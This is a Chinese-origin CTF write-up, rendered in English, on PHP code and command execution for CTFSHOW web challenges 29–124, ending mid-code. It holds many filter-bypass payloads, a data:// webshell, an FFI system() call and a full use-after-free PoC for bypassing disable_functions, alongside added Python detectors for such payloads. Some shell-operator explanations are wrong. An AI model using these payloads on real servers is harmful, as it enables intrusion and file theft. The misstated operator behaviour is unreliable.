
Title: command execution and code execution in PHP
date: 2021-09-15
tags: CTF-web

Command execution and code execution in PHP

Recently I learned some of this material before reviewing it. Because I started from zero, many things may not have been understood; now, reviewing the command execution section, I have learned a lot.

The challenges are all from the web section of CTFSHOW.

It is so friendly for a novice like me!

Command execution and code execution

In PHP, we should first make clear what code execution is and what command execution is.

Generally speaking, code execution means executing PHP code, while command execution means executing commands on the Linux system.

There is a difference between the two: some input that is wrong as PHP code is correct as a Linux command.

This will be analyzed again where it comes up later in the article.

Common code execution functions

PHP allows us to pass in PHP code and execute it. The functions we usually use are:

1. eval($string): treats the string in the parameter as PHP code and executes it. The string must be valid code and must end with a semicolon; both points matter. You can think of eval() as prefixing $string with a PHP open tag, i.e. `<?php $string`. When a semicolon cannot be used, `?>` can be used instead, because in PHP's grammar the last statement before a closing tag does not have to be terminated.
   Note: eval() is a language construct rather than a function, so it cannot be called through a variable function.

2. assert($assertion): if $assertion is a string, assert() executes it as PHP code, and it does not have to end with a semicolon.
   Note: before PHP 7, assert() was a function; from PHP 7 on, assert() is a language construct just like eval(). This point can show up in challenges of the form $_POST[1]($_POST[2]).

3. call_user_func($func, $string): used to call a function. The first parameter is the function to call and the second is the argument passed to the callback. This is not code execution by itself; it can only be called a dangerous function.

Common command execution functions:

PHP also allows us to execute system commands. The common functions are:

1. system(): executes an external program, prints its output, and returns the last line of the output.
   Note: "prints the output and returns the last line" means the result of the command is printed first and then the last line is used as the return value, roughly as if the function did print($result); return $last_line;. If the command contains spaces, quote the command string.

2. exec(): executes an external program and returns the last line of the output.
   Note: only the last line is returned; nothing is printed.

3. passthru(): executes an external program and displays its raw output.

4. shell_exec(): equivalent to the backtick operator; executes the command through the shell environment and returns the complete output as a string.
   Note: this function does not display the output; you need echo to print it. Backticks are a shorthand for shell_exec(); it is actually the same function.

Functions for opening files in linux:

more: display file contents page by page
less: similar to more
head: view the first few lines
tac: display starting from the last line; tac is cat in reverse
tail: view the last few lines
nl: display the file with line numbers
od: read the file contents in binary (octal dump) mode
vi: an editor, which can also be used to view a file
vim: an editor, which can also be used to view a file
sort: can be used to view a file
uniq: can be used to view a file

Some common bypass poses:

Bypassing spaces:
1. %09 (tab)
2. redirection, < and >
3. $
4. /**/ (comment)

When some strings are filtered:
1. cat → ca\t
2. flag → fl\ag → fla''g
3. f* → fla?????
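As an added example (not from the original write-up), the following Python scans constructed access-log lines for the bypass indicators listed above, reusing payloads quoted later in this post as samples; the `$IFS` pattern, the stream-wrapper check and the log format are my assumptions.

```python
from __future__ import annotations

import re
from urllib.parse import parse_qsl, urlsplit

# Bypass indicators taken from the list above. Each entry is the technique
# name and a regex applied to the URL-decoded value of every query parameter.
INDICATORS = [
    ("tab_for_space",       re.compile(r"\t")),                          # %09
    ("redirect_as_space",   re.compile(r"[A-Za-z]<[A-Za-z]")),           # nl<flag.php
    ("ifs_expansion",       re.compile(r"\$\{?IFS")),                    # $IFS / ${IFS} (assumed)
    ("inline_comment",      re.compile(r"/\*\*/")),                      # /**/
    ("backslash_in_word",   re.compile(r"[A-Za-z]\\[A-Za-z]")),          # ca\t, fla\g
    ("empty_quote_in_word", re.compile(r"[A-Za-z](?:''|\"\")[A-Za-z]")), # fl''ag
    ("glob_in_filename",    re.compile(r"(?:[A-Za-z]|/)[?*]+")),         # f*, fla?????, /???/
    ("php_stream_wrapper",  re.compile(r"\b(?:php|data)://", re.I)),     # php://filter, data://
]

# Request target inside a common-log-format line (assumed format).
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+)')


def decoded_params(log_line: str) -> list[tuple[str, str]]:
    """Pull the request target out of a log line and return its query
    parameters with percent-encoding decoded (so %09 becomes a real tab)."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    return parse_qsl(query, keep_blank_values=True)


def scan_request(log_line: str) -> list[str]:
    """Return the sorted names of every bypass indicator found in the request."""
    hits = set()
    for _key, value in decoded_params(log_line):
        for name, pattern in INDICATORS:
            if pattern.search(value):
                hits.add(name)
    return sorted(hits)


# Constructed sample log lines; the requests reuse payloads quoted in this write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Sep/2021:10:00:01 +0000] "GET /index.php?c=passthru(\'more%09f*\'); HTTP/1.1" 200 512',
    '10.0.0.5 - - [15/Sep/2021:10:00:02 +0000] "GET /index.php?c=nl<fla\\g.php|| HTTP/1.1" 200 512',
    '10.0.0.5 - - [15/Sep/2021:10:00:03 +0000] "GET /index.php?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php HTTP/1.1" 200 700',
    '10.0.0.7 - - [15/Sep/2021:10:00:04 +0000] "GET /index.php?c=20-1 HTTP/1.1" 200 64',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_request(line) or "clean", "<-", line.split('"')[1])
```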

CTFSHOW command execution

web 29:

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=system(cat f*);
```

Not much to say: `flag` is filtered, but it is easy to get around. Here is an example.

Under Linux: `ca\t f''lag.php` == `cat flag.php`, and `ca\t f\lag.php` == `cat flag.php`. Nothing more to say.

web 30:

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=passthru('cat f*');
```

system is filtered, so passthru is used instead.

web 31: space filtering

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=passthru('more%09f*');
```

Spaces are filtered, so %09 is used instead. You can also use

web 32-35: semicolon filtering

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=include"$_GET[1]"?>&1=php://filter/convert.base64-encode/resource=flag.php
```

web 33: single and double quotes are filtered as well
payload: `?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php`

web 34:
payload: `?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php`

web 35:
payload: `?c=include$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php`

web 36: digits are filtered
payload: `?c=include$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php`

In this challenge the semicolon is filtered, so we close the statement with `?>` instead. PHP also has many language constructs that need no parentheses, so here we use include and combine it with the file inclusion vulnerability.

web 37,38: file contains

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}else{
    highlight_file(__FILE__);
}
# payload:
#   GET:  ?c=data://text/plain;base64,PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4=
#   POST: 1=system("cat flag.php");
```

Obviously, the PHP code in the included file is executed. Because `flag` is filtered, we cannot use the php://filter wrapper (the resource name would have to contain flag).

So we use the data:// wrapper to write a webshell instead; the base64 above decodes to `<?php eval($_POST[1])?>`.

web 39:

```php
<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=data://text/plain;base64,<?php system("cat f*")?>
```

Here `.php` is appended to c, but our code is already closed with `?>`, so the trailing `.php` does not matter.

web 40: nonparametric RCE

```php
<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));
```

localeconv(): returns an array containing local numeric and currency formatting information; its first value is "."
current(): returns the value of the current element of the array
next(): moves the pointer to the next element and returns it
array_reverse(): returns the array in reverse order
print_r(): prints a variable
highlight_file(): highlights a file, nothing more to say; show_source() has the same effect
array_rand(): randomly picks one or more keys from an array
array_flip(): swaps the keys and values of an array
readfile(): reads a file
session_id(): returns the current session ID
scandir(directory, sorting_order, context): returns the files and directories as an array; the first parameter is the directory and the second the sort order
pos(): takes the first value

web 41: or construction of alphanumeric webshell

Not much to say about this one: XOR and negation are banned, leaving OR, so we construct the payload with OR.

```php
<?php
if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>
```

payload: `c='');('%13%19%13%14%05%0D'|'%60%60%60%60%60%60')(('%03%01%14'|'%60%60%60').' '.('%06%0C%01%07%02%10%08%10'|'%60%60%60%60%2C%60%60%60'));//`

First we need to splice $c into a complete PHP statement: splice in `'');shell;//` so that the evaluated code becomes `echo('');shell;//);`.

Then replace the `shell` in the middle with our constructed `system('cat flag.php')`.

Note that the OR results are joined into a string; we do not have to build that by hand.

Here is a construction script from an expert:

```php
<?php
$payload = 'flag.php'; // the letters to construct
$length = strlen($payload);
$a = '';
$b = '';
$flag = 0;
echo '<br>';
for ($l = 0; $l < $length; $l++) {
    $flag = 0;
    for ($i = 1; $i < 256; $i++) {
        if (preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', chr($i))) continue;
        for ($j = 1; $j < 256; $j++) {
            if (preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', chr($j))) continue;
            if ((chr($i) | chr($j)) === $payload[$l]) {
                echo urlencode(chr($i));
                $a = $a . urlencode(chr($i));
                echo '|';
                echo urlencode(chr($j));
                $b = $b . urlencode(chr($j));
                echo '=' . $payload[$l];
                echo "<br>";
                $flag = 1;
                break;
            }
        }
        if ($flag === 1) {
            break;
        }
    }
}
echo $a . '|' . $b;
```
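The reverse direction, as an added example that is not part of the original post: a decoder an analyst can run over a captured web 41 style payload to recover the command the OR pairs spell out. It relies on the PHP semantics described above (byte-wise `|` on equal-length strings, `.` concatenation); the function names are mine.

```python
import re
from urllib.parse import unquote_to_bytes

# One ('...'|'...') pair of single-quoted, percent-encoded string literals.
OR_PAIR = re.compile(r"\('([^']*)'\|'([^']*)'\)")
# Two adjacent string literals joined by PHP's "." operator.
CONCAT = re.compile(r"'([^']*)'\.'([^']*)'")


def or_strings(left: bytes, right: bytes) -> bytes:
    """PHP's | on two equal-length strings ORs them byte by byte."""
    return bytes(a | b for a, b in zip(left, right))


def resolve_or_pairs(payload: str) -> str:
    """Replace every ('x'|'y') with the literal the OR produces."""
    def repl(m):
        left = unquote_to_bytes(m.group(1))
        right = unquote_to_bytes(m.group(2))
        if len(left) != len(right):      # PHP would truncate; leave it for a human
            return m.group(0)
        return "'" + or_strings(left, right).decode("latin-1") + "'"
    return OR_PAIR.sub(repl, payload)


def fold_concats(payload: str) -> str:
    """Collapse 'a'.'b' chains into one literal, repeating until nothing changes."""
    while True:
        new = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", payload)
        if new == payload:
            return new
        payload = new


def deobfuscate(payload: str) -> str:
    """Full pass: OR pairs first, then concatenations."""
    return fold_concats(resolve_or_pairs(payload))


# The web 41 payload quoted above, as it appears in the write-up (constructed sample).
CAPTURED = ("'');('%13%19%13%14%05%0D'|'%60%60%60%60%60%60')"
            "(('%03%01%14'|'%60%60%60').' '.('%06%0C%01%07%02%10%08%10'|'%60%60%60%60%2C%60%60%60'));//")

if __name__ == "__main__":
    print(deobfuscate(CAPTURED))
```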

web 42: canceling echo

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}
# payload: ?c=cat flag.php;
```

`>/dev/null 2>&1` discards the output, so nothing is echoed. In that case we can simply split the statement, so that the redirection only applies to the part after the separator.

The following separators are available in Linux:

- `;` : semicolon
- `|` : only the latter command is executed
- `||` : only the former command is executed
- `&` : both commands are executed
- `&&` : both commands are executed

You can also use %0a (a newline in the URL) to split lines.

web 43~52:

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=nl flag.php||
```

web 44: additionally filters flag
payload: `?c=nl fla\g.php||`

web 45: additionally filters spaces; bypass with %09
payload: `?c=nl%09fla\g.php||`

web 46: additionally filters $, digits and *
payload: `?c=nl<fla\g.php||`

web 47: additionally filters tac and more
payload: `?c=nl<fla\g.php||`

web 48: additionally filters awk, sed, cut, od, curl
payload: `?c=nl<fla\g.php||`

web 49: solved with the same payload
payload: `?c=nl<fla\g.php||`

web 50: solved with the same payload
payload: `?c=nl<fla\g.php||`

web 51:
payload: `?c=nl<fla\g.php||`

web 52: additionally filters redirection, so change the approach
payload: `?c=nl$fla\g.php||`

web 53:

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=nl$fla\g.php
```

I was in the middle of a challenge when I suddenly found that the challenge had changed. Yes, but not completely: flag was removed.

I tried it myself and found that the first two commands must be present while it is used. No problem.

web 54:ban a lot

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
# payload: ?c=vi$????????
```

This challenge bans far too much, and we are not allowed to splice either. But the problem is not big: we still have vim, vi and uniq.

web 55: the clever use of matching characters

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
```

You can see that spaces are not filtered here, but letters, the semicolon, the backtick and redirection are banned. The main problem is that we cannot construct a command without letters.

Techniques learned here:

Technique 1: first, understand that the bin directory stores the commands we can use. Since no letters are allowed, let's find commands containing digits to execute.

payload1: `?c=/???/????64 ????????` → after glob matching this is `?c=/bin/base64 flag.php`

Technique 2: the /usr/bin directory contains the bzip2 compression command, along with some application tools.

payload2: `?c=/???/???/????2 ????????` → after glob matching this is `?c=/usr/bin/bzip2 flag.php`, which generates the file flag.php.bz2. Then access that file.

Technique 3: alphanumeric webshell improvement (P神, "P God")

Too 🐂 (brilliant). I read this article with admiration.

The `.` command: the usage of the source command under Linux is

`source <file name>`, which executes the commands in the file in the current shell. As shown in the figure, my flag.php contains `cat test.txt`, and test.txt contains `hello world!`.

So now we have `.`. At this point we make use of a feature of PHP.

When we POST a file, it is saved as /tmp/phpXXXXXX, where the last six characters are random upper- and lower-case letters. We can match them with wildcards without any problem.

But there are many such files on a Linux system, so how do we precisely locate the file we uploaded?

Wildcards in Linux have other uses besides * and ?.

For example, `/???/???[-]??????` means the third position is `-`, and by using `[@-[]` (where @ is ASCII 64 and [ is 91) we can match the capital letters.

So we upload a file and then use this method to achieve command execution. Because the last characters are random, you may need to try several times.

web 56: Alphanumeric webshell

```php
<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
}
```

This challenge also bans digits, so the two payloads above no longer work; only the last technique can be used.

web 57:LINUX digital construction

```php
<?php
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
}
```

Obviously the flag is in 36.php, so we need to construct c=36.

Under Linux: `$(())` = 0 and `$((~$(())))` = -1. For ease of understanding, write -1 as a, i.e. a = `$((~$(())))` = -1. Then `$((aaaa))` = -4, because the expression -1-1-1-1 is summed by default, and `$((~$((aaaa))))` = 3: bitwise NOT negates and subtracts 1. So we directly construct it with 37 a's:

payload: `$((~$((aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa))))`

Then replace each a with `$((~$(())))`:

```
$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))
```

Get the flag.

web 58:disable_functions bypass

```php
<?php
if(isset($_POST['c'])){
    $c= $_POST['c'];
    eval($c);
}else{
    highlight_file(__FILE__);
}
# payload: c=show_source('/var/www/html/flag.php');
```

web 59, 60, 61, 63, 64, 65:
payload: `c=show_source('/var/www/html/flag.php');`

web 66: show_source is banned
payload: `c=print_r(scandir("../../../"));`
payload: `c=highlight_file("/flag.txt");`

web 67:
payload: `c=highlight_file("/flag.txt");`

web 68: even more is banned, so exploit the file inclusion vulnerability: a .txt can be included directly, while a .php needs a pseudo protocol.
payload: `c=include("/flag.txt");`

web 69, 70:
payload: `c=include("/flag.txt");`

When I got the challenge I thought, that's it?? Just system("ls") directly. Then I found that system is banned.

I found that everything at the top of my list was banned; phpinfo was banned too.

But isn't this a one-liner webshell? We can connect it to AntSword directly.

Expected solution: because we cannot use command execution to read files, we can only read the file by executing PHP code. Common PHP file-reading functions are:
1. highlight_file()
2. file_get_contents()
3. show_source()
4. fgets()
5. file()
6. readfile()

Other techniques:

```php
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}
copy("flag.php","flag.txt");
rename("flag.php","flag.txt");
```

web 71: early termination

```php
<?php
error_reporting(0);
ini_set('display_errors', 0);
// Are you showing off your skills?
if(isset($_POST['c'])){
    $c= $_POST['c'];
    eval($c);
    $s = ob_get_contents();
    ob_end_clean();
    echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>
Are you going to heaven?
```

payload: `include("/flag.txt");die;` or `include("/flag.txt");exit();`

Using the earlier payload, you find that all letters and digits have been replaced with `?`. So we terminate execution early, before the output buffer is rewritten.

web 72: bypassing open_basedir and disable_functions; the glob:// pseudo protocol

```php
<?php
error_reporting(0);
ini_set('display_errors', 0);
// Are you showing off your skills?
if(isset($_POST['c'])){
    $c= $_POST['c'];
    eval($c);
    $s = ob_get_contents();
    ob_end_clean();
    echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>
Are you going to heaven?
```

open_basedir: restricts the directories the script may access to those given in the setting.

glob:// pseudo protocol

Finds pathnames matching a pattern. Example:

```php
<?php
// Loop over all *.php files in the ext/spl/examples/ directory
// and print the file name and file size
$it = new DirectoryIterator("glob://ext/spl/examples/*.php");
foreach($it as $f) {
    printf("%s: %.1FK\n", $f->getFilename(), $f->getSize()/1024);
}
?>
```

Then we list all files in the root directory:

payload: `c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit();`

You can see that the flag file is flag0.txt. However, we still cannot use include("/flag0.txt"), because open_basedir limits the directories we can access.

Use the AntSword plugin or the following script to bypass open_basedir and disable_functions:

```php
<?php

pwn("uname -a");

function pwn($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() {
            global $backtrace;
            unset($this->a);
            $backtrace = (new Exception)->getTrace(); # ;)
            if(!isset($backtrace[1]['args'])) { # PHP >= 7.4
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { # PT_LOAD, PF_Read_Write
                # handle pie
                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { # PT_LOAD, PF_Read_exec
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'constant' constant check
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                # 'bin2hex' constant check
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) { # ELF header
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) { # system
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {
        # str_shuffle prevents opcache string interning
        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; # increase this value if UAF fails
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    # leaks
    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    # fake value
    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    # fake reference
    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }

    # fake closure object
    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    # pwn
    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); # internal func type
    write($abc, 0xd0 + 0x68, $zif_system); # internal func handler

    ($helper->b)($cmd);
    exit();
}
```

web 73:

This challenge has no open_basedir restriction.

payload: `c=include("/flagc.txt");exit();`

web 74:

payload: `c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit();`
payload: `c=include("/flagx.txt");exit();`

web 75, 76: bypassing open_basedir through the database's load_file function

payload: `c=$a=new DirectoryIterator("glob:///*");foreach($a as $f)exit();`

```php
c=try {
    $dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root'); // connect to the database
    foreach($dbh->query('select load_file("/flag36.txt")') as $row) // use load_file to load flag36.txt
        $dbh = null;
} catch (PDOException $e) { exit(0); }
```

This technique is impressive, but first you have to obtain the database configuration file.

web 77: reading a file with FFI (PHP >= 7.4)

payload: `c=$ffi=FFI::cdef("int system(char *command);", "libc.so.6");$a='/readflag > 1.txt';$ffi->system($a);exit();`

FFI (Foreign Function Interface) refers to the technique of calling code written in another language from one language. PHP's FFI extension is a way to call C code from PHP.

```php
$ffi = FFI::cdef("int system(const char *command);"); // create the FFI object exposing system
$a = 'cat /flag36x.txt > 1.txt'; // redirect to a file because there is no echo
$ffi->system($a); // call the C system function through $ffi
```

However, flag36x.txt is empty, so we execute the readflag command instead.

web 118: clever use of environment variables under Linux

As shown in the figure:

Lowercase letters are filtered, so we use substring slicing to construct our payload. It can be seen that `~` combined with a capital letter takes the last character.

The hint adds this picture. The current directory of the challenge must be PWD=/var/www/html. If it ends in bin, as is usual, then `nl flag.php` can be constructed.

payload: `$$ ????.???`

web 119, 120: clever use of environment variables under Linux

$ is disabled in this challenge, so we need to find other alternatives.

Under Linux, `${#variable}` gives the length of the variable's value. For example, with a=12345, `${#a}` = 5; it can be understood as having the same effect as strlen. The value of $ is generally 1, so `${#$}` = 1. $RANDOM returns a random number in 0~32767, in which 4- and 5-digit values are the most likely, so `${#RANDOM}` is most likely 4 or 5. Then we use the matching command above for blind guessing.

payload: `$}???$}?????${#RANDOM} ????.???` => `/bin/base64 flag.php`

You may need to try a few more times, because whether ${#RANDOM} comes out as 4 is random.

web 121: SHLVL filtered

Under Linux, `${#?}` = 1.

payload1: `$}???$}?????${#RANDOM} ????.???`
payload2: `$}???$}$:${#?}}?? ????.???`

Here `${#IFS}` is the length of IFS, which consists of a space, a tab and a newline. Combined with $ and PWD=/var/www/html it matches exactly `r`. Then use `rev flag.php` to output each line of the file in reverse.

web 122: PWD filtered

payload: `code=<A;$???$?????$ ????.???`

Master yu said: `${}` returns error code 1 locally, but the challenge environment returns 2, so `<A` is used instead. The error return of `<A` is also 1, so the digit 1 is obtained successfully, and the digit 4 from RANDOM is just random.

web 124: CISCN 2019 LOVE MATH

An original challenge from the national competition. The core test point is the use of an alphanumeric webshell built from mathematical functions.

```php
<?php
error_reporting(0);
//I heard you like math very much. I wonder whether you love it more than the flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //Example c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("It's too long to count");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("Please do not enter strange characters");
        }
    }
    //Common mathematical functions http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
